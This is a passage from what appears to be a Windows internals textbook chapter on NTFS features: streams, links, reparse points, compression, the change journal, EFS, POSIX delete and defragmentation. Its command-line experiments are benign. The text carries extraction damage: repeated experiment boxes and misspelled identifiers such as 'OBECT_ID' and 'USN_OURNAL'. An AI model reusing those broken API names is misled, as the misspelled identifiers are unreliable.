EXPERIMENT: Looking at streams
Most Windows applications aren’t designed to work with alternate named streams, but both the
echo and more commands are. Thus, a simple way to view streams in action is to create a named
stream using echo and then display it using more. The following command sequence creates a
file named test with a stream named stream:
c:\Test>echo Hello from a named stream! > test:stream
c:\Test>more < test:stream
Hello from a named stream!
c:\Test>
If you perform a directory listing, Test’s file size doesn’t reflect the data stored in the alternate
stream because NTFS returns the size of only the unnamed data stream for file query operations,
including directory listings.
c:\Test>dir test
Volume in drive C is OS.
Volume Serial Number is F080-620F
Directory of c:\Test
12/07/2018 05:33 PM
0 test
1 File(s)
0 bytes
0 Dir(s) 18,083,577,856 bytes free
c:\Test>
You can determine what files and directories on your system have alternate data streams
with the Streams utility from Sysinternals (see the following output) or by using the /r switch
in the dir command.
c:\Test>streams test
streams v1.60 - Reveal NTFS alternate streams.
Copyright (C) 2005-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
c:\Test\test:
:stream:$DATA 29
EXPERIMENT: Looking at streams
Most Windows applications aren’t designed to work with alternate named streams, but both the
echo and more commands are. Thus, a simple way to view streams in action is to create a named
stream using echo and then display it using more. The following command sequence creates a
file named test with a stream named stream:
c:\Test>echo Hello from a named stream! > test:stream
c:\Test>more < test:stream
Hello from a named stream!
c:\Test>
If you perform a directory listing, Test’s file size doesn’t reflect the data stored in the alternate
stream because NTFS returns the size of only the unnamed data stream for file query operations,
including directory listings.
c:\Test>dir test
Volume in drive C is OS.
Volume Serial Number is F080-620F
Directory of c:\Test
12/07/2018 05:33 PM
0 test
1 File(s)
0 bytes
0 Dir(s) 18,083,577,856 bytes free
c:\Test>
You can determine what files and directories on your system have alternate data streams
with the Streams utility from Sysinternals (see the following output) or by using the /r switch
in the dir command.
c:\Test>streams test
streams v1.60 - Reveal NTFS alternate streams.
Copyright (C) 2005-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
c:\Test\test:
:stream:$DATA 29
CHAPTER 11
Caching and file systems
633
Unicode-based names
Like Windows as a whole, NTFS supports 16-bit Unicode 1.0/UTF-16 characters to store names of files,
directories, and volumes. Unicode allows each character in each of the world’s major languages to be
uniquely represented (Unicode can even represent emoji, or small drawings), which aids in moving data
easily from one country to another. Unicode is an improvement over the traditional representation of
international characters—using a double-byte coding scheme that stores some characters in 8 bits and
others in 16 bits, a technique that requires loading various code pages to establish the available charac-
ters. Because Unicode has a unique representation for each character, it doesn’t depend on which code
page is loaded. Each directory and file name in a path can be as many as 255 characters long and can
contain Unicode characters, embedded spaces, and multiple periods.
General indexing facility
The NTFS architecture is structured to allow indexing of any file attribute on a disk volume using a
B-tree structure. (Creating indexes on arbitrary attributes is not exported to users.) This structure
enables the file system to efficiently locate files that match certain criteria—for example, all the files in
a particular directory. In contrast, the FAT file system indexes file names but doesn’t sort them, making
lookups in large directories slow.
Several NTFS features take advantage of general indexing, including consolidated security descrip-
tors, in which the security descriptors of a volume’s files and directories are stored in a single internal
stream, have duplicates removed, and are indexed using an internal security identifier that NTFS
defines. The use of indexing by these features is described in the section “NTFS on-disk structure” later
in this chapter.
Dynamic bad-cluster remapping
Ordinarily, if a program tries to read data from a bad disk sector, the read operation fails and the data
in the allocated cluster becomes inaccessible. If the disk is formatted as a fault-tolerant NTFS volume,
however, the Windows volume manager—or Storage Spaces, depending on the component that
provides data redundancy—dynamically retrieves a good copy of the data that was stored on the
bad sector and then sends NTFS a warning that the sector is bad. NTFS will then allocate a new cluster,
replacing the cluster in which the bad sector resides, and copies the data to the new cluster. It adds
the bad cluster to the list of bad clusters on that volume (stored in the hidden metadata file BadClus)
and no longer uses it. This data recovery and dynamic bad-cluster remapping is an especially useful
feature for file servers and fault-tolerant systems or for any application that can’t afford to lose data. If
the volume manager or Storage Spaces is not used when a sector goes bad (such as early in the boot
sequence), NTFS still replaces the cluster and doesn’t reuse it, but it can’t recover the data that was on
the bad sector.
634
CHAPTER 11
Caching and file systems
Hard links
A hard link allows multiple paths to refer to the same file. (Hard links are not supported on directories.)
If you create a hard link named C:\Documents\Spec.doc that refers to the existing file C:\Users
\Administrator\Documents\Spec.doc, the two paths link to the same on-disk file, and you can make chang-
es to the file using either path. Processes can create hard links with the Windows CreateHardLink function.
NTFS implements hard links by keeping a reference count on the actual data, where each time
a hard link is created for the file, an additional file name reference is made to the data. This means
that if you have multiple hard links for a file, you can delete the original file name that referenced
the data (C:\Users\Administrator\Documents\Spec.doc in our example), and the other hard links
(C:\Documents\Spec.doc) will remain and point to the data. However, because hard links are on-disk
local references to data (represented by a file record number), they can exist only within the same vol-
ume and can’t span volumes or computers.
EXPERIMENT: Creating a hard link
There are two ways you can create a hard link: the fsutil hardlink create command or the mklink
utility with the /H option. In this experiment we’ll use mklink because we’ll use this utility later to cre-
ate a symbolic link as well. First, create a file called test.txt and add some text to it, as shown here.
C:\>echo Hello from a Hard Link > test.txt
Now create a hard link called hard.txt as shown here:
C:\>mklink hard.txt test.txt /H
Hardlink created for hard.txt <<===>> test.txt
If you list the directory’s contents, you’ll notice that the two files will be identical in every way,
with the same creation date, permissions, and file size; only the file names differ.
c:\>dir *.txt
Volume in drive C is OS
Volume Serial Number is F080-620F
Directory of c:\
12/07/2018 05:46 PM
26 hard.txt
12/07/2018 05:46 PM
26 test.txt
2 File(s)
52 bytes
0 Dir(s) 15,150,333,952 bytes free
Symbolic (soft) links and junctions
In addition to hard links, NTFS supports another type of file-name aliasing called symbolic links or soft
links. Unlike hard links, symbolic links are strings that are interpreted dynamically and can be rela-
tive or absolute paths that refer to locations on any storage device, including ones on a different local
volume or even a share on a different system. This means that symbolic links don’t actually increase the
reference count of the original file, so deleting the original file will result in the loss of the data, and a
symbolic link that points to a nonexisting file will be left behind. Finally, unlike hard links, symbolic links
can point to directories, not just files, which gives them an added advantage.
EXPERIMENT: Creating a hard link
There are two ways you can create a hard link: the fsutil hardlink create command or the mklink
utility with the /H option. In this experiment we’ll use mklink because we’ll use this utility later to cre-
ate a symbolic link as well. First, create a file called test.txt and add some text to it, as shown here.
C:\>echo Hello from a Hard Link > test.txt
Now create a hard link called hard.txt as shown here:
C:\>mklink hard.txt test.txt /H
Hardlink created for hard.txt <<===>> test.txt
If you list the directory’s contents, you’ll notice that the two files will be identical in every way,
with the same creation date, permissions, and file size; only the file names differ.
c:\>dir *.txt
Volume in drive C is OS
Volume Serial Number is F080-620F
Directory of c:\
12/07/2018 05:46 PM
26 hard.txt
12/07/2018 05:46 PM
26 test.txt
2 File(s)
52 bytes
0 Dir(s) 15,150,333,952 bytes free
CHAPTER 11
Caching and file systems
635
For example, if the path C:\Drivers is a directory symbolic link that redirects to %SystemRoot%\
System32\Drivers, an application reading C:\Drivers\Ntfs.sys actually reads %SystemRoot%\System\
Drivers\Ntfs.sys. Directory symbolic links are a useful way to lift directories that are deep in a direc-
tory tree to a more convenient depth without disturbing the original tree’s structure or contents. The
example just cited lifts the Drivers directory to the volume’s root directory, reducing the directory
depth of Ntfs.sys from three levels to one when Ntfs.sys is accessed through the directory symbolic
link. File symbolic links work much the same way—you can think of them as shortcuts, except they’re
actually implemented on the file system instead of being .lnk files managed by Windows Explorer. Just
like hard links, symbolic links can be created with the mklink utility (without the /H option) or through
the CreateSymbolicLink API.
Because certain legacy applications might not behave securely in the presence of symbolic links,
especially across different machines, the creation of symbolic links requires the SeCreateSymbolicLink
privilege, which is typically granted only to administrators. Starting with Windows 10, and only if
Developer Mode is enabled, callers of CreateSymbolicLink API can additionally specify the SYMBOLIC_
LINK_FLAG _ ALLOW_UNPRIVILEGED_CREATE flag to overcome this limitation (this allows a standard
user is still able to create symbolic links from the command prompt window). The file system also has a
behavior option called SymLinkEvaluation that can be configured with the following command:
fsutil behavior set SymLinkEvaluation
By default, the Windows default symbolic link evaluation policy allows only local-to-local and local-
to-remote symbolic links but not the opposite, as shown here:
D:\>fsutil behavior query SymLinkEvaluation
Local to local symbolic links are enabled
Local to remote symbolic links are enabled.
Remote to local symbolic links are disabled.
Remote to Remote symbolic links are disabled.
Symbolic links are implemented using an NTFS mechanism called reparse points. (Reparse points are
discussed further in the section “Reparse points” later in this chapter.) A reparse point is a file or direc-
tory that has a block of data called reparse data associated with it. Reparse data is user-defined data
about the file or directory, such as its state or location that can be read from the reparse point by the
application that created the data, a file system filter driver, or the I/O manager. When NTFS encounters
a reparse point during a file or directory lookup, it returns the STATUS_REPARSE status code, which
signals file system filter drivers that are attached to the volume and the I/O manager to examine the
reparse data. Each reparse point type has a unique reparse tag. The reparse tag allows the component
responsible for interpreting the reparse point’s reparse data to recognize the reparse point without
having to check the reparse data. A reparse tag owner, either a file system filter driver or the I/O man-
ager, can choose one of the following options when it recognizes reparse data:
I
The reparse tag owner can manipulate the path name specified in the file I/O operation
that crosses the reparse point and let the I/O operation reissue with the altered path name.
Junctions (described shortly) take this approach to redirect a directory lookup, for example.
I
The reparse tag owner can remove the reparse point from the file, alter the file in some way,
and then reissue the file I/O operation.
636
CHAPTER 11
Caching and file systems
There are no Windows functions for creating reparse points. Instead, processes must use the FSCTL_
SET_REPARSE_POINT file system control code with the Windows DeviceIoControl function. A process
can query a reparse point’s contents with the FSCTL_GET_REPARSE_POINT file system control code.
The FILE_ATTRIBUTE_REPARSE_POINT flag is set in a reparse point’s file attributes, so applications can
check for reparse points by using the Windows GetFileAttributes function.
Another type of reparse point that NTFS supports is the junction (also known as Volume Mount
point). Junctions are a legacy NTFS concept and work almost identically to directory symbolic links,
except they can only be local to a volume. There is no advantage to using a junction instead of a direc-
tory symbolic link, except that junctions are compatible with older versions of Windows, while directory
symbolic links are not.
As seen in the previous section, modern versions of Windows now allow the creation of reparse points
that can point to non-empty directories. The system behavior (which can be controlled from minifilters
drivers) depends on the position of the reparse point in the target file’s full path. The filter manager, NTFS,
and ReFS file system drivers use the exposed FsRtlIsNonEmptyDirectoryReparsePointAllowed API to detect
if a reparse point type is allowed on non-empty directories.
EXPERIMENT: Creating a symbolic link
This experiment shows you the main difference between a symbolic link and a hard link, even
when dealing with files on the same volume. Create a symbolic link called soft.txt as shown here,
pointing to the test.txt file created in the previous experiment:
C:\>mklink soft.txt test.txt
symbolic link created for soft.txt <<===>> test.txt
If you list the directory’s contents, you’ll notice that the symbolic link doesn’t have a file size
and is identified by the <SYMLINK> type. Furthermore, you’ll note that the creation time is that
of the symbolic link, not of the target file. The symbolic link can also have security permissions
that are different from the permissions on the target file.
C:\>dir *.txt
Volume in drive C is OS
Volume Serial Number is 38D4-EA71
Directory of C:\
05/12/2012 11:55 PM
8 hard.txt
05/13/2012 12:28 AM <SYMLINK>
soft.txt [test.txt]
05/12/2012 11:55 PM
8 test.txt
3 File(s)
16 bytes
0 Dir(s) 10,636,480,512 bytes free
Finally, if you delete the original test.txt file, you can verify that both the hard link and sym-
bolic link still exist but that the symbolic link does not point to a valid file anymore, while the hard
link references the file data.
EXPERIMENT: Creating a symbolic link
This experiment shows you the main difference between a symbolic link and a hard link, even
when dealing with files on the same volume. Create a symbolic link called soft.txt as shown here,
pointing to the test.txt file created in the previous experiment:
C:\>mklink soft.txt test.txt
symbolic link created for soft.txt <<===>> test.txt
If you list the directory’s contents, you’ll notice that the symbolic link doesn’t have a file size
and is identified by the <SYMLINK> type. Furthermore, you’ll note that the creation time is that
of the symbolic link, not of the target file. The symbolic link can also have security permissions
that are different from the permissions on the target file.
C:\>dir *.txt
Volume in drive C is OS
Volume Serial Number is 38D4-EA71
Directory of C:\
05/12/2012
11:55 PM
8 hard.txt
05/13/2012
12:28 AM
<SYMLINK>
soft.txt [test.txt]
05/12/2012
11:55 PM
8 test.txt
3 File(s)
16 bytes
0 Dir(s)
10,636,480,512 bytes free
Finally, if you delete the original test.txt file, you can verify that both the hard link and sym-
bolic link still exist but that the symbolic link does not point to a valid file anymore, while the hard
link references the file data.
CHAPTER 11
Caching and file systems
637
Compression and sparse files
NTFS supports compression of file data. Because NTFS performs compression and decompression
procedures transparently, applications don’t have to be modified to take advantage of this feature.
Directories can also be compressed, which means that any files subsequently created in the directory
are compressed.
Applications compress and decompress files by passing DeviceIoControl the FSCTL_SET_
COMPRESSION file system control code. They query the compression state of a file or directory
with the FSCTL_GET_COMPRESSION file system control code. A file or directory that is compressed
has the FILE_ATTRIBUTE_COMPRESSED flag set in its attributes, so applications can also determine a
file or directory’s compression state with GetFileAttributes.
A second type of compression is known as sparse files. If a file is marked as sparse, NTFS doesn’t al-
locate space on a volume for portions of the file that an application designates as empty. NTFS returns
0-filled buffers when an application reads from empty areas of a sparse file. This type of compression
can be useful for client/server applications that implement circular-buffer logging, in which the server
records information to a file, and clients asynchronously read the information. Because the information
that the server writes isn’t needed after a client has read it, there’s no need to store the information
in the file. By making such a file sparse, the client can specify the portions of the file it reads as empty,
freeing up space on the volume. The server can continue to append new information to the file without
fear that the file will grow to consume all available space on the volume.
As with compressed files, NTFS manages sparse files transparently. Applications specify a file’s
sparseness state by passing the FSCTL_SET_SPARSE file system control code to DeviceIoControl. To set
a range of a file to empty, applications use the FSCTL_SET_ZERO_DATA code, and they can ask NTFS
for a description of what parts of a file are sparse by using the control code FSCTL_QUERY_ALLOCATED
_RANGES. One application of sparse files is the NTFS change ournal, described next.
Change logging
Many types of applications need to monitor volumes for file and directory changes. For example, an
automatic backup program might perform an initial full backup and then incremental backups based
on file changes. An obvious way for an application to monitor a volume for changes is for it to scan the
volume, recording the state of files and directories, and on a subsequent scan detect differences. This
process can adversely affect system performance, however, especially on computers with thousands or
tens of thousands of files.
An alternate approach is for an application to register a directory notification by using the FindFirst
ChangeNotification or ReadDirectoryChangesW Windows function. As an input parameter, the application
specifies the name of a directory it wants to monitor, and the function returns whenever the contents
of the directory change. Although this approach is more efficient than volume scanning, it requires
the application to be running at all times. Using these functions can also require an application to scan
directories because FindFirstChangeNotification doesn’t indicate what changed—just that something
in the directory has changed. An application can pass a buffer to ReadDirectoryChangesW that the FSD
638
CHAPTER 11
Caching and file systems
fills in with change records. If the buffer overflows, however, the application must be prepared to fall
back on scanning the directory.
NTFS provides a third approach that overcomes the drawbacks of the first two: an application can
configure the NTFS change journal facility by using the DeviceIoControl function’s FSCTL_CREATE_
USN_ JOURNAL file system control code (USN is update sequence number) to have NTFS record infor-
mation about file and directory changes to an internal file called the change ournal. A change journal is
usually large enough to virtually guarantee that applications get a chance to process changes without
missing any. Applications use the FSCTL_QUERY_USN_OURNAL file system control code to read re-
cords from a change journal, and they can specify that the DeviceIoControl function not complete until
new records are available.
Per-user volume quotas
Systems administrators often need to track or limit user disk space usage on shared storage volumes,
so NTFS includes quota-management support. NTFS quota-management support allows for per-user
specification of quota enforcement, which is useful for usage tracking and tracking when a user reaches
warning and limit thresholds. NTFS can be configured to log an event indicating the occurrence to the
System event log if a user surpasses his warning limit. Similarly, if a user attempts to use more volume
storage then her quota limit permits, NTFS can log an event to the System event log and fail the ap-
plication file I/O that would have caused the quota violation with a “disk full” error code.
NTFS tracks a user’s volume usage by relying on the fact that it tags files and directories with the se-
curity ID (SID) of the user who created them. (See Chapter 7, “Security,” in Part 1 for a definition of SIDs.)
The logical sizes of files and directories a user owns count against the user’s administrator-defined
quota limit. Thus, a user can’t circumvent his or her quota limit by creating an empty sparse file that is
larger than the quota would allow and then fill the file with nonzero data. Similarly, whereas a 50 KB file
might compress to 10 KB, the full 50 KB is used for quota accounting.
By default, volumes don’t have quota tracking enabled. You need to use the Quota tab of a vol-
ume’s Properties dialog box, shown in Figure 11-25, to enable quotas, to specify default warning and
limit thresholds, and to configure the NTFS behavior that occurs when a user hits the warning or limit
threshold. The Quota Entries tool, which you can launch from this dialog box, enables an administra-
tor to specify different limits and behavior for each user. Applications that want to interact with NTFS
quota management use COM quota interfaces, including IDiskQuotaControl, IDiskQuotaUser, and
IDiskQuotaEvents.
CHAPTER 11
Caching and file systems
639
FIGURE 11-25 The Quota Settings dialog accessible from the volume’s Properties window.
Link tracking
Shell shortcuts allow users to place files in their shell namespaces (on their desktops, for example) that
link to files located in the file system namespace. The Windows Start menu uses shell shortcuts exten-
sively. Similarly, object linking and embedding (OLE) links allow documents from one application to be
transparently embedded in the documents of other applications. The products of the Microsoft Office
suite, including PowerPoint, Excel, and Word, use OLE linking.
Although shell and OLE links provide an easy way to connect files with one another and with the
shell namespace, they can be difficult to manage if a user moves the source of a shell or OLE link (a link
source is the file or directory to which a link points). NTFS in Windows includes support for a service
application called distributed link-tracking, which maintains the integrity of shell and OLE links when
link targets move. Using the NTFS link-tracking support, if a link target located on an NTFS volume
moves to any other NTFS volume within the originating volume’s domain, the link-tracking service can
transparently follow the movement and update the link to reflect the change.
NTFS link-tracking support is based on an optional file attribute known as an object ID. An application
can assign an object ID to a file by using the FSCTL_CREATE_OR_GET_OBECT_ID (which assigns an ID if
one isn’t already assigned) and FSCTL_SET_OBECT_ID file system control codes. Object IDs are queried
with the FSCTL_CREATE_OR_GET_OBECT_ID and FSCTL_GET_OBECT_ID file system control codes. The
FSCTL_DELETE_OBECT_ID file system control code lets applications delete object IDs from files.
640
CHAPTER 11
Caching and file systems
Encryption
Corporate users often store sensitive information on their computers. Although data stored on com-
pany servers is usually safely protected with proper network security settings and physical access con-
trol, data stored on laptops can be exposed when a laptop is lost or stolen. NTFS file permissions don’t
offer protection because NTFS volumes can be fully accessed without regard to security by using NTFS
file-reading software that doesn’t require Windows to be running. Furthermore, NTFS file permissions
are rendered useless when an alternate Windows installation is used to access files from an adminis-
trator account. Recall from Chapter 6 in Part 1 that the administrator account has the take-ownership
and backup privileges, both of which allow it to access any secured object by overriding the object’s
security settings.
NTFS includes a facility called Encrypting File System (EFS), which users can use to encrypt sensitive
data. The operation of EFS, as that of file compression, is completely transparent to applications, which
means that file data is automatically decrypted when an application running in the account of a user
authorized to view the data reads it and is automatically encrypted when an authorized application
changes the data.
Note NTFS doesn’t permit the encryption of files located in the system volume’s root direc-
tory or in the \Windows directory because many files in these locations are required during
the boot process, and EFS isn’t active during the boot process. BitLocker is a technology
much better suited for environments in which this is a requirement because it supports full-
volume encryption. As we will describe in the next paragraphs, Bitlocker collaborates with
NTFS for supporting file-encryption.
EFS relies on cryptographic services supplied by Windows in user mode, so it consists of both a
kernel-mode component that tightly integrates with NTFS as well as user-mode DLLs that communi-
cate with the Local Security Authority Subsystem (LSASS) and cryptographic DLLs.
Files that are encrypted can be accessed only by using the private key of an account’s EFS private/
public key pair, and private keys are locked using an account’s password. Thus, EFS-encrypted files on
lost or stolen laptops can’t be accessed using any means (other than a brute-force cryptographic at-
tack) without the password of an account that is authorized to view the data.
Applications can use the EncryptFile and DecryptFile Windows API functions to encrypt and decrypt
files, and FileEncryptionStatus to retrieve a file or directory’s EFS-related attributes, such as whether the
file or directory is encrypted. A file or directory that is encrypted has the FILE_ATTRIBUTE_ENCRYPTED
flag set in its attributes, so applications can also determine a file or directory’s encryption state with
GetFileAttributes.
CHAPTER 11
Caching and file systems
641
POSIX-style delete semantics
The POSIX Subsystem has been deprecated and is no longer available in the Windows operating
system. The Windows Subsystem for Linux (WSL) has replaced the original POSIX Subsystem. The NTFS
file system driver has been updated to unify the differences between I/O operations supported in
Windows and those supported in Linux. One of these differences is provided by the Linux unlink (or rm)
command, which deletes a file or a folder. In Windows, an application can’t delete a file that is in use by
another application (which has an open handle to it); conversely, Linux usually supports this: other pro-
cesses continue to work well with the original deleted file. To support WSL, the NTFS file system driver
in Windows 10 supports a new operation: POSIX Delete.
The Win32 DeleteFile API implements standard file deletion. The target file is opened (a new handle
is created), and then a disposition label is attached to the file through the NtSetInformationFile native
API. The label just communicates to the NTFS file system driver that the file is going to be deleted. The
file system driver checks whether the number of references to the FCB (File Control Block) is equal to 1,
meaning that there is no other outstanding open handle to the file. If so, the file system driver marks
the file as “deleted on close” and then returns. Only when the handle to the file is closed does the IRP_
M_CLEANUP dispatch routine physically remove the file from the underlying medium.
A similar architecture is not compatible with the Linux unlink command. The WSL subsystem, when
it needs to erase a file, employs POSIX-style deletion; it calls the NtSetInformationFile native API with
the new FileDispositionInformationEx information class, specifying a flag (FILE_DISPOSITION_POSIX_
SEMANTICS). The NTFS file system driver marks the file as POSIX deleted by inserting a flag in its
Context Control Block (CCB, a data structure that represents the context of an open instance of an
on-disk object). It then re-opens the file with a special internal routine and attaches the new handle
(which we will call the PosixDeleted handle) to the SCB (stream control block). When the original handle
is closed, the NTFS file system driver detects the presence of the PosixDeleted handle and queues a
work item for closing it. When the work item completes, the Cleanup routine detects that the handle
is marked as POSIX delete and physically moves the file in the “\Extend\Deleted” hidden directory.
Other applications can still operate on the original file, which is no longer in the original namespace
and will be deleted only when the last file handle is closed (the first delete request has marked the FCB
as delete-on-close).
If for any unusual reason the system is not able to delete the target file (due to a dangling reference
in a defective kernel driver or due to a sudden power interruption), the next time that the NTFS file sys-
tem has the chance to mount the volume, it checks the \Extend\Deleted directory and deletes every
file included in it by using standard file deletion routines.
Note Starting with the May 2019 Update (19H1), Windows 10 now uses POSIX delete as the
default file deletion method. This means that the DeleteFile API uses the new behavior.
642
CHAPTER 11
Caching and file systems
EXPERIMENT: Witnessing POSIX delete
In this experiment, you’re going to witness a POSIX delete through the FsTool application, which
is available in this book’s downloadable resources. Make sure you’re using a copy of Windows
Server 2019 (RS5). Indeed, newer client releases of Windows implement POSIX deletions by
default. Start by opening a command prompt window. Use the /touch FsTool command-line
argument to generate a txt file that’s exclusively used by the application:
D:\>FsTool.exe /touch d:\Test.txt
NTFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Touching "d:\Test.txt" file... Success.
The File handle is valid... Press Enter to write to the file.
When requested, instead of pressing the Enter key, open another command prompt window
and try to open and delete the file:
D:\>type Test.txt
The process cannot access the file because it is being used by another process.
D:\>del Test.txt
D:\>dir Test.txt
Volume in drive D is DATA
Volume Serial Number is 62C1-9EB3
Directory of D:\
12/13/2018 12:34 AM
49 Test.txt
1 File(s)
49 bytes
0 Dir(s) 1,486,254,481,408 bytes free
As expected, you can’t open the file while FsTool has exclusive access to it. When you try to
delete the file, the system marks it for deletion, but it’s not able to remove it from the file system
namespace. If you try to delete the file again with File Explorer, you can witness the same behav-
ior. When you press Enter in the first command prompt window and you exit the FsTool applica-
tion, the file is actually deleted by the NTFS file system driver.
The next step is to use a POSIX deletion for getting rid of the file. You can do this by specifying
the /pdel command-line argument to the FsTool application. In the first command prompt win-
dow, restart FsTool with the /touch command-line argument (the original file has been already
marked for deletion, and you can’t delete it again). Before pressing Enter, switch to the second
window and execute the following command:
D:\>FsTool /pdel Test.txt
NTFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Deleting "Test.txt" file (Posix semantics)... Success.
Press any key to exit...
EXPERIMENT: Witnessing POSIX delete
In this experiment, you’re going to witness a POSIX delete through the FsTool application, which
is available in this book’s downloadable resources. Make sure you’re using a copy of Windows
Server 2019 (RS5). Indeed, newer client releases of Windows implement POSIX deletions by
default. Start by opening a command prompt window. Use the /touch FsTool command-line
argument to generate a txt file that’s exclusively used by the application:
D:\>FsTool.exe /touch d:\Test.txt
NTFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Touching "d:\Test.txt" file... Success.
The File handle is valid... Press Enter to write to the file.
When requested, instead of pressing the Enter key, open another command prompt window
and try to open and delete the file:
D:\>type Test.txt
The process cannot access the file because it is being used by another process.
D:\>del Test.txt
D:\>dir Test.txt
Volume in drive D is DATA
Volume Serial Number is 62C1-9EB3
Directory of D:\
12/13/2018 12:34 AM
49 Test.txt
1 File(s)
49 bytes
0 Dir(s) 1,486,254,481,408 bytes free
As expected, you can’t open the file while FsTool has exclusive access to it. When you try to
delete the file, the system marks it for deletion, but it’s not able to remove it from the file system
namespace. If you try to delete the file again with File Explorer, you can witness the same behav-
ior. When you press Enter in the first command prompt window and you exit the FsTool applica-
tion, the file is actually deleted by the NTFS file system driver.
The next step is to use a POSIX deletion for getting rid of the file. You can do this by specifying
the /pdel command-line argument to the FsTool application. In the first command prompt win-
dow, restart FsTool with the /touch command-line argument (the original file has been already
marked for deletion, and you can’t delete it again). Before pressing Enter, switch to the second
window and execute the following command:
D:\>FsTool /pdel Test.txt
NTFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Deleting "Test.txt" file (Posix semantics)... Success.
Press any key to exit...
CHAPTER 11
Caching and file systems
643
D:\>dir Test.txt
Volume in drive D is DATA
Volume Serial Number is 62C1-9EB3
Directory of D:\
File Not Found
In this case the Test.txt file has been completely removed from the file system’s namespace
but is still valid. If you press Enter in the first command prompt window, FsTool is still able to write
data to the file. This is because the file has been internally moved into the \Extend\Deleted
hidden system directory.
Defragmentation
Even though NTFS makes efforts to keep files contiguous when allocating blocks to extend a file, a vol-
ume’s files can still become fragmented over time, especially if the file is extended multiple times or when
there is limited free space. A file is fragmented if its data occupies discontiguous clusters. For example,
Figure 11-26 shows a fragmented file consisting of five fragments. However, like most file systems (includ-
ing versions of FAT on Windows), NTFS makes no special efforts to keep files contiguous (this is handled
by the built-in defragmenter), other than to reserve a region of disk space known as the master file table
(MFT) zone for the MFT. (NTFS lets other files allocate from the MFT zone when volume free space runs
low.) Keeping an area free for the MFT can help it stay contiguous, but it, too, can become fragmented.
(See the section “Master file table” later in this chapter for more information on MFTs.)
Fragmented file
Contiguous file
FIGURE 11-26 Fragmented and contiguous files.
To facilitate the development of third-party disk defragmentation tools, Windows includes a de-
fragmentation API that such tools can use to move file data so that files occupy contiguous clusters.
The API consists of file system controls that let applications obtain a map of a volume’s free and in-use
clusters (FSCTL_GET_VOLUME_BITMAP), obtain a map of a file’s cluster usage (FSCTL_GET_RETRIEVAL
_POINTERS), and move a file (FSCTL_MOVE_FILE).
D:\>dir Test.txt
Volume in drive D is DATA
Volume Serial Number is 62C1-9EB3
Directory of D:\
File Not Found
In this case the Test.txt file has been completely removed from the file system’s namespace
but is still valid. If you press Enter in the first command prompt window, FsTool is still able to write
data to the file. This is because the file has been internally moved into the \Extend\Deleted
hidden system directory.
644
CHAPTER 11
Caching and file systems
Windows includes a built-in defragmentation tool that is accessible by using the Optimize Drives
utility (%SystemRoot%\System32\Dfrgui.exe), shown in Figure 11-27, as well as a command-line inter-
face, %SystemRoot%\System32\Defrag.exe, that you can run interactively or schedule, but that does
not produce detailed reports or offer control—such as excluding files or directories—over the defrag-
mentation process.
FIGURE 11-27 The Optimize Drives tool.
The only limitation imposed by the defragmentation implementation in NTFS is that paging
files and NTFS log files can’t be defragmented. The Optimize Drives tool is the evolution of the Disk
Defragmenter, which was available in Windows 7. The tool has been updated to support tiered vol-
umes, SMR disks, and SSD disks. The optimization engine is implemented in the Optimize Drive service
(Defragsvc.dll), which exposes the IDefragEngine COM interface used by both the graphical tool and
the command-line interface.
For SSD disks, the tool also implements the retrim operation. To understand the retrim operation,
a quick introduction of the architecture of a solid-state drive is needed. SSD disks store data in flash
memory cells that are grouped into pages of 4 to 16 KB, grouped together into blocks of typically 128
to 512 pages. Flash memory cells can only be directly written to when they’re empty. If they contain
data, the contents must be erased before a write operation. An SSD write operation can be done on
a single page but, due to hardware limitations, erase commands always affect entire blocks; conse-
quently, writing data to empty pages on an SSD is very fast but slows down considerably once previ-
ously written pages need to be overwritten. (In this case, first the content of the entire block is stored in
CHAPTER 11
Caching and file systems
645
cache, and then the entire block is erased from the SSD. The overwritten page is written to the cached
block, and finally the entire updated block is written to the flash medium.) To overcome this problem,
the NTFS File System Driver tries to send a TRIM command to the SSD controller every time it deletes
the disk’s clusters (which could partially or entirely belong to a file). In response to the TRIM command,
the SSD, if possible, starts to asynchronously erase entire blocks. Noteworthy is that the SSD controller
can’t do anything in case the deleted area corresponds only to some pages of the block.
The retrim operation analyzes the SSD disk and starts to send a TRIM command to every cluster in
the free space (in chunks of 1-MB size). There are different motivations behind this:
I
TRIM commands are not always emitted. (The file system is not very strict on trims.)
I
The NTFS File System emits TRIM commands on pages, but not on SSD blocks. The Disk
Optimizer, with the retrim operation, searches fragmented blocks. For those blocks, it first
moves valid data back to some temporary blocks, defragmenting the original ones and insert-
ing even pages that belongs to other fragmented blocks; finally, it emits TRIM commands on
the original cleaned blocks.
Note The way in which the Disk Optimizer emits TRIM commands on free space is some-
what tricky: Disk Optimizer allocates an empty sparse file and searches for a chunk (the size
of which varies from 128 KB to 1 GB) of free space. It then calls the file system through the
FSCTL_MOVE_FILE control code and moves data from the sparse file (which has a size of 1
GB but does not actually contain any valid data) into the empty space. The underlying file
system actually erases the content of the one or more SSD blocks (sparse files with no valid
data yield back chunks of zeroed data when read). This is the implementation of the TRIM
command that the SSD firmware does.
For Tiered and SMR disks, the Optimize Drives tool supports two supplementary operations: Slabify
(also known as Slab Consolidation) and Tier Optimization. Big files stored on tiered volumes can be
composed of different Extents residing in different tiers. The Slab consolidation operation not only
defragments the extent table (a phase called Consolidation) of a file, but it also moves the file content
in congruent slabs (a slab is a unit of allocation of a thinly provisioned disk; see the “Storage Spaces”
section later in this chapter for more information). The final goal of Slab Consolidation is to allow files
to use a smaller number of slabs. Tier Optimization moves frequently accessed files (including files that
have been explicitly pinned) from the capacity tier to the performance tier and, vice versa, moves less
frequently accessed files from the performance tier to the capacity tier. To do so, the optimization en-
gine consults the tiering engine, which provides file extents that should be moved to the capacity tier
and those that should be moved to the performance tier, based on the Heat map for every file accessed
by the user.
Note Tiered disks and the tiering engine are covered in detail in the following sections of
the current chapter.
646
CHAPTER 11
Caching and file systems
EXPERIMENT: Retrim an SSD volume
You can execute a Retrim on a fast SSD or NVMe volume by using the defrag.exe /L command,
as in the following example:
D:\>defrag /L c:
Microsoft Drive Optimizer
Copyright (c) Microsoft Corp.
Invoking retrim on (C:)...
The operation completed successfully.
Post Defragmentation Report:
Volume Information:
Volume size
= 475.87 GB
Free space
= 343.80 GB
Retrim:
Total space trimmed
